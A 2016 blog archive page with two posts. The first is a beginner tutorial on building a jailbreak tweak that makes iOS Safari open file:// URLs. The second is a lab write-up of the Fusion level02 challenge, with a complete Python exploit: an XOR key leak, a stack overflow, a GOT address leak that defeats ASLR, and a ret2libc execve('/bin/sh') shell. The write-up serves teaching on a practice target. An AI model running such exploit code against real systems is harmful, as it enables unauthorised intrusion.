Light Bulb: 2016

Sunday, September 4, 2016

A First Look at Tweak Development: Enabling File URL Support for Safari

I've always been interested in getting into tweak development, but I've been busy doing other things, and I've also not had a jailbroken iPhone (sigh). A few days ago, I got my golden chance. It was a request on the r/jailbreak subreddit, asking for a tweak to enable browsing the filesystem using the Safari browser through the file:// protocol/scheme. I imagined it was a simple tweak to develop, which would be suitable for a first time tweak.

The Problem

Normally, the Safari app on iOS, doesn't allow viewing files in the filesystem. If you would attempt to browse a local file, using an URL like file:///path/to/my/file, you would be greeted with a message:

Safari cannot open the page because it is a local file.

The error message displayed in iOS 9.3.3

Our mission is to grab the MobileSafari binary from our iDevice, and then find out where in the app this alert is triggered.

Prerequisites

We really need to talk about the prerequisites to following this tutorial. First of all, it is a no brainer that you need to know Objective-C. It follows that you also need to know a little bit of C. I'm not saying you should be able to write a compiler in C — you only need to understand the basics, and preferably be able to write a simple class in Objective-C.

Now, for this tutorial, you won't need to know ARM assembly — I know I don't (albeit I do have experience with x86 assembly). ARM assembly is a must if you wish to become a good mobile reverser, however. Also, you will need a disassembler. I'll be using a trial version of Hopper (https://hopperapp.com), but feel free to use what you have. Hex Rays (https://hex-rays.com) also offers IDA as a demo version which is known to work with 32 bit binaries (it doesn't work with 64 bit binaries).

Next, you need to have Theos set up in your development environment. I won't go into the details of setting up Theos, but I might do so in another post.

Lastly, you need to have a jailbroken iOS device, which I suppose you already do.

Examining the Binary

Now that we are ready, let's first retrieve the binary for Safari. In order to do that, connect to your iOS device with your favorite SCP client, and retrieve the following file:

/Applications/MobileSafari.app/MobileSafari

Now let's load the binary in our disassembler. The first thing to do after loading the binary, is to search for the error string that Safari shows when we try to browse the filesystem. Hopper has a very nice user interface — it allows us to quickly search for a string within the binary, on its left pane.

Search results

We search for the string "local file", and the first result in the list is actually the string we are looking for. So we go ahead and double click it — this takes us to the location of the string in the disassembly.

Now that we found the string, we need to find the part of the code which accesses the string. Hopper is once again very useful: we click on the address (0x1001698ac), and then press the 'x' key. This shows us the list of the parts of the code which have references to the string we found.

List of references to our string

As we can see, there is only one reference to the string we found. We select the only result, and then click on the Go button. This will take us, in the disassembly, to the part of code which accesses our string.

Code that references our string

I know you might be puzzled about what this is. First of all, notice that there is a bunch of similar things, prefixed by the dq pseudo-instruction, which stands for declare-quad (word). We can see that between each line there is a difference of 0x10, or 16 bytes. So each line, or entry, is made of 16 bytes, or 4 words. Each word represents a thing. We are dealing with some sort of internal representation of strings. Each entry is made of the type, which for the string is ___CFConstantStringClassReference, a word which should be a bunch of flags for internal purposes which seems to be the same: 0x7c8 (I'm not sure about it, nor do we care), another word which is the actual address of the string literal (does 0x1001698ac ring a bell?), and finally another word which seems to be the length of our string. Indeed, 0x37 is 55 in decimal, which just happens to be the length of the error string.

Let's click on the address once again (0x1001911b0, it's highlighted in the screenshot above), and press 'x' once again.

Code that uses our string finally shows up

We get this nice popup once again, and this time we found our target. We can see that it is a method in the TabDocument class which starts with _decidePolicyForAction. Let's click on the Go button, and find out its full name.

This time we will land on real code in the disassembly. What we need to do is scroll up until we see that "Beginning of Procedure" thing that Hopper nicely shows for us.

The method we should place our hook on

There it is, in all its glory, the method which shows us that nasty popup when we try to browse our filesystem from Safari. This means we should hook onto this method, in order to defeat Safari and make it obey to us. So our target method is _decidePolicyForAction:request:inMainFrame:forNewWindow:currentURLIsFileURL:decisionHandler: of the TabDocument class.

But what should we do, specifically?

A Little Bit of Theo(s)ry

Before we can start working on anything, we should create the project for our tweak. Open up your terminal, and type $THEOS/bin/nic.pl. Theos will prompt you for the basic configuration needed:

Eltons-iMac:arm Elton$ $THEOS/bin/nic.pl
NIC 2.0 - New Instance Creator
------------------------------
[1.] iphone/activator_event
[2.] iphone/application_modern
[3.] iphone/cydget
[4.] iphone/flipswitch_switch
[5.] iphone/framework
[6.] iphone/ios7_notification_center_widget
[7.] iphone/library
[8.] iphone/notification_center_widget
[9.] iphone/preference_bundle_modern
[10.] iphone/tool
[11.] iphone/tweak
[12.] iphone/xpc_service
Choose a Template (required): 11

So initially Theos asks you for the template. Here we enter 11, because we want to write a tweak.

Project Name (required): fileProto

It also asks you for the project name, which you can feel free to change :)

Package Name [com.yourcompany.fileProto]: com.youcanchangeit.fileproto

Next is the package name, which you can choose to change (recommended).

Author/Maintainer Name [Default Name]: Your Name

Next it asks you for the author's name.

[iphone/tweak] MobileSubstrate Bundle filter [com.apple.springboard]: com.apple.mobilesafari

This is the bundle filter for the process we are going to hook onto. We enter com.apple.mobilesafari, which is the bundle filter for the MobileSafari process.

[iphone/tweak] List of applications to terminate upon installation (space-separated, '-' for none) [SpringBoard]: MobileSafari

Here is the list of applications which should be terminated upon our tweak's installation, so that the tweak is loaded. We enter MobileSafari, because we want Safari to restart so that our tweak get's loaded.

Instantiating iphone/tweak in fileProto/...
Done.

And, this is it. The tweak project is set up in the fileProto directory (or whatever the project name you chose was).

The project directory structure is rather simple: there is control, which is just a text file containing meta-data about our tweak, Makefile, which is used by Theos in the build process, projectName.plist (in my case fileProto.plist), and also the Tweak.xm file. We will only play with the Tweak.xm file, where the source code of our tweak will reside. This file also contains some comments which help you when you're writing your first tweak.

I know you can't wait to get your hands dirty, so let's learn just enough Logos for our purposes. Logos is the set of directives which we use in our tweak code to enable them to hook on methods we choose, and it looks pretty nice, too.

The directives start with a % symbol, followed by the directive name. We are going to use only four directives: %hook, %orig and %log...%end. I placed %end intentionally where it belongs, in the end. Let's now see how these directives are used.

The %hook directive is used to hook onto a specific class. So we create what is called a hook block, and we place all the methods we want to hook onto, inside this block.

%hook ClassName
    -(void) methodName {
        // yay! we hooked on a method
    }
%end

The hook block is closed with the %end directive. Inside the block we place the method we are going to replace (the method must exist, obviously). There are ways to add new methods, but this is out of the scope of this post. The %hook directive will automatically include the ClassName.h header. So where do we get this header? Well, we could use a tool named class-dump, or search the web if some nice guy has already uploaded the headers somewhere (There's also class-dump-z, but I used class-dump as I'm on a Hackintosh). Using class-dump is really easy, all you have to do is type the command:

Eltons-iMac:arm Elton$ ./class-dump MobileSafari > MobileSafari.h

This will dump the headers of our MobileSafari binary into MobileSafari.h. Now we have some housecleaning to do. Open MobileSafari.h, and find the string @interface TabDocument. Now delete everything above this string. Now find the string @end. Delete everything below this string. Now we are left with the header of the TabDocument class only. But, we can take it further.

Replace the long string in the beginning @interface TabDocument : NSObject <AppBannerMetaTagContentObserver... (until the first curly bracket {), with simply @interface TabDocument. Now delete everything between the curly braces. Next, delete everything between @interface TabDocument and @end, except for the definition of our method, which should look like this:

- (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(CDUnknownBlockType)arg6;

Lastly, replace CDUnknownBlockType with id. Now save the header. The header file should now look like this:

@interface TabDocument

- (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(id)arg6;

@end

Now feel free to rename MobileSafari.h into TabDocument.h, this way the header can be included automatically.

Now we are going to use %log and %orig. %log is used to log all the parameters, whereas %orig is used to call the original version of the function we are hooked onto. Right now we are going to hook onto the method we found earlier, log all the arguments and then call the original function.

So let's load our Tweak.xm file and write this code:

%hook TabDocument
    - (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(id)arg6 {
        %log;  // this is enough to log all our arguments :)
        %orig; // and this is all that's needed to call the original function with the original arguments
    }
%end

We can see how easy Logos makes it to log the arguments and call the original function with the supplied arguments. Now let's build our tweak and install it, by opening the terminal, changing the working directory to the directory of our project, and then running:

make package install

This will compile our tweak, build the deb package inside the packages folder, and then install it into our device. Next, we should open up Safari, browse to a URL like file:///test and then inspect syslog for the logged arguments. Here is a good article which explains how to read syslog on your iDevice.

You should be able to find something like the following in your syslog:

Sep 4 23:09:20 Eltons-iPhone MobileSafari[6377] <Notice>: [fileProto] Tweak.xm:4 DEBUG: ...

Something of interest in the log message is the request argument: there we can see that this is actually of type NSMutableURLRequest. Also, it is important to notice that currentURLIsFileURL has a value of 0, so it probably doesn't do what it looks like it does. My first thought was actually to set this argument to NO, but it was NO already, i.e. 0.

Writing the Tweak

We concluded the previous section with a brief note about two seemingly important arguments, where one argument was actually useless.

Now, we could attempt to rewrite the whole method we hooked onto, but that would be too difficult: I promised we won't need ARM disassembling skills. Well, there is an easier way.

By using our critical thinking skills, we can conclude that, since currentURLIsFileURL is useless, the only argument that has information about the URL being visited is the request argument. So, if we mess with that argument, and temporarily set the URL to a fake URL, perhaps we could get away with it and have a working tweak. Sounds like a plan.

%hook TabDocument
    - (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(id)arg6 {
        NSURL *originalUrl = [arg2 URL];
        
        BOOL urlStartsWithFile = [[originalUrl absoluteString] hasPrefix:@"file://"];
        
        // only make the change if the URL starts with file://
        if (urlStartsWithFile) {
            // set a fake URL
            [arg2 setURL:[NSURL URLWithString:@"http://www.google.com"]];
        }
        
        %orig; // let the original function think we're visiting google :D
 
        if (urlStartsWithFile) {
             [arg2 setURL:originalUrl]; // restore the original URL if it was changed
        }
    }
%end

So we first save the original URL, and then we check if it starts with the file:// prefix. If so, we change the URL temporarily to google.com, so that the original function doesn't know we're actually trying to view a local file. Next we call the original function, and finally we restore the original URL if it was changed.

Let's build the tweak and install it with:

make package install

Now, let's create a file in our device, by ssh-ing into our device and typing:

echo "hi" > /var/tmp/pwn.txt

The final test is approaching. Open up Safari, and browse to the following URL:

file:///var/tmp/pwn.txt

You should be greeted with something like below:

Congratulations!

This means our small tweak has done its job. You deserve to pat yourself on the back.

Final Words

We took a first look at tweak development with Theos. We saw how we can take a binary from our device and reverse it to find out more. We generated the headers, took a quick look at Logos, gathered information about the arguments of our target method, devised a simple strategy, and finally we developed our tweak.

You can find the source code of the fileProto project in github. Note: the source code may be a little bit different from what we've presented here, but the idea remains the same.

Wednesday, August 17, 2016

Exploit Exercises Fusion Level 02 Writeup

In this first post, we're going to exploit level 02 of Fusion from exploit-exercises.com. We will see how we can leverage a buffer overflow vulnerability, to find our way into the much desired shell. If you haven't already, download the fusion live cd ISO image, and boot it with Virtualbox or any other virtualization software you have.

First of all, let's see the source code of the challenge, and point out a few important things.


#include "../common/common.c"    

#define XORSZ 32

void cipher(unsigned char *blah, size_t len)
{
  static int keyed;
  static unsigned int keybuf[XORSZ];

  int blocks;
  unsigned int *blahi, j;

  if(keyed == 0) {
      int fd;
      fd = open("/dev/urandom", O_RDONLY);
      if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf)) exit(EXIT_FAILURE);
      close(fd);
      keyed = 1;
  }

  blahi = (unsigned int *)(blah);
  blocks = (len / 4);
  if(len & 3) blocks += 1;

  for(j = 0; j < blocks; j++) {
      blahi[j] ^= keybuf[j % XORSZ];
  }
}

void encrypt_file()
{
  // http://thedailywtf.com/Articles/Extensible-XML.aspx
  // maybe make bigger for inevitable xml-in-xml-in-xml ?
  unsigned char buffer[32 * 4096];

  unsigned char op;
  size_t sz;
  int loop;

  printf("[-- Enterprise configuration file encryption service --]\n");
  
  loop = 1;
  while(loop) {
      nread(0, &op, sizeof(op));
      switch(op) {
          case 'E':
              nread(0, &sz, sizeof(sz));
              nread(0, buffer, sz);
              cipher(buffer, sz);
              printf("[-- encryption complete. please mention "
              "474bd3ad-c65b-47ab-b041-602047ab8792 to support "
              "staff to retrieve your file --]\n");
              nwrite(1, &sz, sizeof(sz));
              nwrite(1, buffer, sz);
              break;
          case 'Q':
              loop = 0;
              break;
          default:
              exit(EXIT_FAILURE);
      }
  }
      
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);
  set_io(fd);

  encrypt_file();
}

A Short Walkthrough

Let's start by looking at main(). It looks to be serving at a specific port, and upon receiving a connection, it calls encrypt_file(). The binary for this level (as with all other levels) is located at /opt/fusion/bin/level02. Normally all levels follow a pattern: level01 listens to port 20001, level02 listens to port 20002, but for the tutorial's sake, let's see what port it is listening to:

fusion@fusion:~$ sudo lsof -i | grep level02
...
level02 1471 20002 3u IPv4 12112 0t0 TCP *:20002 (LISTEN)

As we can see, it is indeed listening to port 20002. Let's now take a look at encrypt_file(). It is the landing function when connected to the host. Basically what the function does is, it has an a loop which initially accepts a single char, which can be either 'E' or 'Q'. 'Q' makes the function return, while 'E' is used to encrypt our data with the key the server has generated.

If we choose to encrypt data, the server requires that we send an integer which is equal to the length of the plaintext, followed by the plaintext itself. nread() is used to read data from us, with the first parameter being 0, which stands for STDIN, the second parameter being the place where to store the value being read, and the third parameter being the size of the data to read. After the data is encrypted, the server will write to us back in a similar fashion the size of the encrypted data, followed by the data itself. nwrite() is used to write data back to us, with the only difference being that the first parameter is now 1, which stands for STDOUT. Then the loop restarts.

The only function we haven't yet seen is cipher(). The cipher() function may seem a little daunting at first, but all it really does is, it xor encrypts our data with a randomly generated key. Moreover, the key doesn't change for the lifetime of the connection. The key is of type int[32], and it encrypts our data in blocks of 128 bytes.

Time to talk about the fun part: the vulnerability. But, by now, you must've spotted the vulnerability. If not, please do not continue reading until you find out where the vulnerability is.

So, as you have already noticed (you did follow my advice, didn't you?) the vulnerability is that buffer has a size of 131072 bytes, but all nread() cares about is the size of the data we send to it, thus allowing us to overflow the buffer as we please.

Getting Control of EIP

We have reviewed the source code of the vulnerable program, and we also showed why the program was vulnerable. Now we are going to exploit this vulnerability, by first doing the simplest thing you can do to a vulnerable program: crash it. To do this, we are going to overwrite the return address of the encrypt_file() function with an invalid address. However, we have just a minor obstacle in front of us.

Sure enough, sending a sufficiently large plaintext to encrypt, will crash the server. However, we want to be able to alter the server's state in a meaningful way, thus we need to take account of the encryption.

Let's just lay a little bit of foundation for the exploit we will be writing.

import socket
from struct import pack, unpack
import telnetlib

def connect(host='localhost', port=20002):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s


def consume_welcome_message(fd):
    welcome_message = "[-- Enterprise configuration file encryption service --]\n"
    
    # return the message if needed for debugging purposes
    return fd.read(len(welcome_message))

def send_quit(fd):
    fd.write('Q')

def encrypt_data(fd, data):
    """this function sends data for encryption to the server. returns the encrypted data"""
    fd.write('E' + pack('<I', len(data)) + data) 
    success_message = "[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\n"
    fd.read(len(success_message)) # ignore the encryption complete message
    encrypted_data_len, = unpack('<I', fd.read(4))
    return fd.read(encrypted_data_len)

def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    encrypted_test = encrypt_data(sock_fd, 'test data to encrypt')

if __name__ == '__main__':
    main()

We wrote a set of functions which will help us to develop the exploit later on. The file descriptor is used instead of the socket in order to avoid calling recv() repeatedly when trying to read fixed length data.

Retrieving the Encryption Key

I know it is beginning to look like a really long journey, but believe me, we will soon get to the fun part. Now let's dive a little bit deeper into what happens when we send the data to encrypt to the server. Right after the server receives the data, a call to cipher() follows. By carefully inspecting cipher(), we can deduce that the function encrypts the buffer in place, then the same buffer is sent back to us. Also, remember that as long as we keep the same connection to the server, the encryption key will remain the same.

Xor encryption is a very simple one. The way it works, makes it really easy to retrieve the original key if we have the plaintext and the ciphertext. Since we already have the plaintext, and we also get the ciphertext back when encrypting the data, we can easily retrieve the key. Let's now write the methods necessary to perform xor encryption and to retrieve the key.


def xor(value, key):
    # isn't python a joy?
    return ''.join([chr(ord(e) ^ ord(key[i % len(key)])) for i, e in enumerate(value)])

def retrieve_key(fd):
    dummy_data = 'A' * 128
    return xor(dummy_data, encrypt_data(fd, dummy_data))

There we have it. We wrote our xor encryption routine, and also a method to retrieve the encryption key.

Back to Owning EIP

Alright, we now can retrieve the encryption key with which the server is encrypting the data we send. As I previously mentioned, xor has a very nice property:

If A xor B = C, then A xor C = B, and also B xor C = A.

So if we encrypt the encrypted data, we get back the original plaintext. Get it? If we encrypt the data before sending it, the cipher() function will actually decrypt the data, effectively leaving our original data in memory.

So now we are free to own the EIP as we wish. We know that the buffer's size is 131072 bytes. So we need to add a few more bytes in order to enjoy our first victory.

Let's write a method to do just that.


def crash_server(fd, key, bufsize=131072):
    junk = 'A' * 131072 # this will fill the buffer completely
    overwrite = 'AAAABBBBCCCCDDDDEEEEFFFF'
    data = xor(junk + overwrite, key)
    encrypt_data(fd, data)
    send_quit(fd)

# let's change our main method
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    crash_server(sock_fd, key)

So we wrote the crash_server() method, which takes the socket file descriptor and the encryption key, and sends a payload which should crash the server by setting EIP to a bogus address. We first send the data by calling the encrypt_data() method, then we send 'Q' to make the encrypt_file() function in the server return to our overwritten address. Let's see if 24 bytes are enough to overwrite the return address.

So, we run the script, and...well, nothing. We need to check the logs:

fusion@fusion:~$ dmesg | tail
[...]

[104449.594025] level02[11212]: segfault at 45454545 ip 45454545 sp bfd93020 error 14

Oh boy...it looks like the server crashed at EIP 0x45454545. If your ASCII is a little bit rusty, you can verify that 0x45 (or 69 decimal) belongs to the character E. So we can deduce that 16 bytes beyond the buffer, we start overwriting the return address.

An Arbitrary Read Primitive

So far we have taken control of EIP, meaning we can make execution flow to an address we wish. But we have two protections to defeat: NX & ASLR. They work very well in conjuction, but the moment we beat ASLR, NX becomes pretty weak. We now get to the harder (and more fun) part of exploitation. In order to beat ASLR, we either have to bruteforce it (yuck!), or find a way to leak a memory address which will then be used to find out other addresses of interest. The latter is what we are going to do now.

In order to leak information from memory, we need a way to get that data to us. I hear what you are saying...the answer is nwrite(). This function reads from a specific address, and writes that data to us via the socket connection. But, what to read? Before we move on to read from an actually useful address, we are going to read the string "Enterprise" from the server, to make sure that things are working.

In order to setup the exploit, we first need a few things. Let's load the level02 binary in gdb and find the address of nwrite() and the address of the "Enterprise" string.

fusion@fusion:~$ gdb /opt/fusion/bin/level02
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /opt/fusion/bin/level02...done.
(gdb) p &nwrite

$1 = (ssize_t (*)(int, void *, size_t)) 0x80495a0 <nwrite>

So we can see that nwrite() resides in address 0x80495a0. Now we need to find the address of the string "Enterprise". We know that the function encrypt_file() prints the welcome message when first called. So let's disassemble that function and see what we can find.

(gdb) disas encrypt_file
Dump of assembler code for function encrypt_file:
0x080497f7 <+0>: push %ebp
0x080497f8 <+1>: mov %esp,%ebp
0x080497fa <+3>: sub $0x20028,%esp
0x08049800 <+9>: movl $0x8049e04,(%esp)
0x08049807 <+16>: call 0x8048930 <puts@plt>

Just at the top of the function, we can see a call to puts(). The source code shows that the code actually calls printf(), but maybe the compiler has optimized it to use puts() since it contains just a simple string and no formatting. So we have no choice but to see what is the value in the only parameter that is passed to puts(), that is 0x8049e04.

(gdb) p (char*) 0x8049e04

$3 = 0x8049e04 "[-- Enterprise configuration file encryption service --]"

And sure enough, there is our warm welcoming message. So our welcoming message is at address 0x8049e04, but we want to get only the string "Enterprise", not the whole string. So the address we need is 0x8049e04 + 4, to skip the first 4 characters, which gives us 0x8049e08.

So we know the address of the function we are going to call, we know the address of the data we are going to read (and its size), now we are missing only one piece of the puzzle: How? To answer that question, we need to take a look at how the stack is laid out when we crash the server with the proof-of-concept code we wrote above where we overwrote the return address with 0x45454545.

As we found out previously, there was a gap of 16 bytes between the buffer and the saved return address. So the stack looked something like below: (hint: you can verify by attaching gdb to the running process)

----------------------
| return address |
----------------------
| saved ebp address |
----------------------
| unknown (4 bytes) |
----------------------
| unknown (4 bytes) |
----------------------
| unknown (4 bytes) |
----------------------
| buffer (131072 bytes)|
----------------------

Then, after sending the data to encrypt (which overflowed), the stack became like below:

----------------------
| 0x45454545 | <-- EEEE
----------------------
| 0x44444444 | <-- DDDD
----------------------
| 0x43434343 | <-- CCCC
----------------------
| 0x42424242 | <-- BBBB
----------------------
| 0x41414141 | <-- AAAA
----------------------
| buffer (131072 bytes)| <-- filled with A's
----------------------

So far so good. We know that we need to replace the return address with the address of nwrite(). How about its parameters? Well, it makes sense to discuss a little bit how a function is called in ASM by using nwrite() as an example. Normally we would push the arguments first, starting from the rightmost argument to the first, and then call the function. Here's how it would be in code:


push $10        ; push the length of the string (3rd argument)
push $0x8049e08 ; push the address of the string Enterprise (2nd argument)
push $1         ; push STDOUT (1st argument)
call 0x80495a0  ; call nwrite

Moreover the call instruction could also be written as:


push return_address ; address nwrite will return to, when done
jmp 0x80495a0       ; jump to nwrite to execute the function

So, in order to execute the nwrite() function, we need to write 4 values after overwriting the return address, in the reverse order in which they are pushed to the stack in the code snippet above. Armed with this information, let's change our Python script so that it tries to read the string we want.


def test_arbitrary_read(fd, key, param_addr, param_size):
    junk_len = 131072 + 16
    nwrite_address = 0x80495a0
    nwrite_return = 0xdeadbeef
    param_stdout = 1
    payload = junk_len * 'A'
    payload += pack('<I', nwrite_address)
    payload += pack('<I', nwrite_return)
    payload += pack('<I', param_stdout)
    payload += pack('<I', param_addr)
    payload += pack('<I', param_size)
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # trigger the exploit
    print fd.read(10) # must print Enterprise

# let's change main
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    test_arbitrary_read(sock_fd, key, 0x8049e08, 10) # read 10 bytes from 0x8049e08 and print them

Alright, we have our code all set up. We do the usual connect() call, followed by the method that consumes the welcome message, next we retrieve the key, and we finally call our arbitrary read method. Since we have decided that nwrite() will return to 0xdeadbeef, it means that we should also check the logs to see if the server will crash at that address or not. Now let's run it.

fusion@fusion:~$ ./exploit.py
Enterprise

Nice! It seems we were able to read that sought after "Enterprise" string. Let's also inspect the logs to see if there is any crash:

fusion@fusion:~$ dmesg | tail
[...]
[173049.114112] level02[16997]: segfault at deadbeef ip deadbeef sp bfd93024 error 15

As expected, we have our controlled demolition right there, at 0xdeadbeef, as promised.

In GOT We Trust

We now have an arbitrary read primitive, which we can use to leak an address. This is such a great victory. The next step is also an important step, which relies on our ability to read arbitrarily from the memory of the victim process. Our plan is as follows:

Leak the address of a function from libc and use this address to compute the ASLR offset.
Use the address above to deduce the address of execve(), and the address of the string "/bin/sh".
Construct the shell payload.
Profit!

We're at step 1 right now, so we need to determine the function whose address we are going to leak. Before we get to that, let's just give a brief overview of how the program the addresses of libc functions. Basically, there is something called the Global Offset Table (GOT), which serves like a list of addresses. The basic idea is that this table contains the address where the address of a certain function in libc will be stored in runtime. It's as if the GOT were saying to us that, the address of function printf() at runtime will be stored in 0xcodebabe. So if we were to read what is stored in 0xcodebabe at runtime, we would find another address, say 0xaabbccdd. 0xaabbccdd would be the address of printf() at runtime. We can use the objdump tool to view the GOT entry for a function:

fusion@fusion:~$ objdump -R /opt/fusion/bin/level02

/opt/fusion/bin/level02: file format elf32-i386

DYNAMIC RELOCATION RECORDS

OFFSET TYPE VALUE

0804b368 R_386_GLOB_DAT __gmon_start__

0804b420 R_386_COPY __environ

0804b424 R_386_COPY stderr

0804b428 R_386_COPY stdin

0804b440 R_386_COPY stdout

0804b378 R_386_JUMP_SLOT setsockopt

0804b37c R_386_JUMP_SLOT dup2

0804b380 R_386_JUMP_SLOT setresuid

0804b384 R_386_JUMP_SLOT read

0804b388 R_386_JUMP_SLOT printf

[...] other entries follow

So, at runtime, 0x804b388 will contain the address to printf(). But it doesn't end here. The value will be populated with the correct printf() address only after it has been called for the first time. For that reason, we also have PLT, the Procedure Linkage Table. The program works directly with the PLT. So if our program wants to call printf(), it will actually call a small stub called printf@plt(). If we try to disassemble the printf() function in gdb, we will end up disassembling this stub. Let's give it a try:

(gdb) disas printf

Dump of assembler code for function printf@plt:

0x08048870 <+0>: jmp *0x804b388

0x08048876 <+6>: push $0x20

0x0804887b <+11>: jmp 0x8048820

End of assembler dump.

It looks like the stub doesn't do much. The first line of the stub jumps to the address stored in 0x804b388. That looks like the GOT entry for printf(). Let's inspect that address with gdb:

(gdb) x *0x804b388

0x8048876 <printf@plt+6>: 0x00002068

So 0x804b388, which is the GOT entry for printf(), actually contains 0x8048876, which is the second instruction in the printf@plt() stub. The two other instructions of the stub, will basically call the resolver, which will resolve the real address of printf(), and also update its GOT entry, so that the next time it is accessed there will be the address of the printf() function.

This information was provided so that we know what to look for, and why. Specifically, we are looking for a function about which we are 100% percent that it will have been called at least once, so that the address we leak from its GOT entry is the address of the function. For this reason, we will choose the function puts(). If you remember, we show that puts() is called instead of printf() above, when we disassembled the first instructions of the encrypt_file() function. Now we need the GOT entry address for puts(). We can find it out by using objdump:

fusion@fusion:~$ objdump -R /opt/fusion/bin/level02 | grep puts

0804b3b8 R_386_JUMP_SLOT puts

So, in order to leak the address of puts() in runtime, we need to read the value stored in 0x804b3b8.

Digging Our Way Towards the Shell

We theoretically solved the first step in our checklist (introduced in the section above), and we are now very close to getting to the shell. Let's first find out the addresses of execve() and "/bin/sh" relative to puts().

fusion@fusion:~$ ps -ef | grep level02

20002 1471 1 0 Aug15 ? 00:00:00 /opt/fusion/bin/level02

fusion 18773 2023 0 23:28 pts/1 00:00:00 grep --color=auto level02

fusion@fusion:~$ sudo gdb /opt/fusion/bin/level02 --pid=1471

[sudo] password for fusion:

GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08

[...]

Loaded symbols for /lib/i386-linux-gnu/libc.so.6

Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.

Loaded symbols for /lib/ld-linux.so.2

0xb7730424 in __kernel_vsyscall ()

(gdb) find &system, &system+100000000, "/bin/sh"

0xb76e08da

warning: Unable to access target memory at 0xb7722f62, halting search.

1 pattern found.

(gdb) find &system, &system+10000000, "/bin/sh"

0xb76e08da

warning: Unable to access target memory at 0xb7722f62, halting search.

1 pattern found.

(gdb) x &puts

0xb76083b0 <_IO_puts>: 0x8920ec83

(gdb) x &execve

0xb7643910 <__execve>: 0x8908ec83

So we first found the pid for level02, we attached gdb to the process, and now we will use the addresses we found to compute the offset from puts() for execve() and "/bin/sh".

execve_offset = 0xb7643910 - 0xb76083b0

binsh_offset = 0xb76e08da - 0xb76083b0

We will use these offsets in our exploit payload. Now the plan is to first leak the address of puts(), then redirect execution from nwrite() to encrypt_file() again. We will overflow the buffer in encrypt_file() again, this time issuing a call to execve("/bin/sh", NULL, NULL) and thus launching the shell. Let's waste no time and write ourselves an exploit:


def exploit(fd, key):
    junk_len = 131072 + 16
    nwrite_address = 0x80495a0
    encrypt_file = 0x080497f7 # address of encrypt_file() we got from gdb
                              # in the arbitrary read primitive section
    puts_got_entry = 0x804b3b8 
    param_stdout = 1
    payload = junk_len * 'A'
    payload += pack('<I', nwrite_address)
    payload += pack('<I', encrypt_file)
    payload += pack('<I', param_stdout)
    payload += pack('<I', puts_got_entry)
    payload += pack('<I', 4) # 4 = size of address
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # trigger the exploit
    
    puts_address, = unpack('<I', fd.read(4))
    
    consume_welcome_message(fd) # welcome message is printed again
    
    execve_offset = 0xb7643910 - 0xb76083b0
    binsh_offset = 0xb76e08da - 0xb76083b0
    
    payload = junk_len * 'A'
    payload += pack('<I', execve_offset + puts_address)
    payload += pack('<I', 0xdeadbeef)
    payload += pack('<I', binsh_offset + puts_address)
    payload += pack('<I', 0) # two NULL
    payload += pack('<I', 0) # arguments
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # spawn the shell


# now changes to our main method
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    
    # after this method call the shell will be listening for our commands
    exploit(sock_fd, key)
    
    # we use telnetlib to interact with the shell
    t = telnetlib.Telnet()
    t.sock = sock
    t.interact()

Our main method now calls the exploit method, and then we can see we use the interact() method of a Telnet object. Since the victim program's I/O is connected to the socket, and we expect to have executed the execve("/bin/sh", NULL, NULL) command, the shell should be listening for our commands from the socket. The Telnet object, given the socket, abstracts the boring stuff from us, and provides to us a simple interface to issue commands.

If everything went well, executing that script should give us a shell prompt:

fusion@fusion:~$ ./exploit.py
id

uid=20002 gid=20002 groups=20002

As we can see, after running the script, it doesn't exit. Instead, it is waiting for us to input a command. We give the command id, and we get the uid, gid and groups with a value of 20002, meaning we have successfully exploited level02 and gained shell access. Congratulations!

You can also find the exploit on GitHub. There are minor changes compared to the code in here, but the basics remain the same.

I'd love to hear your thoughts on this.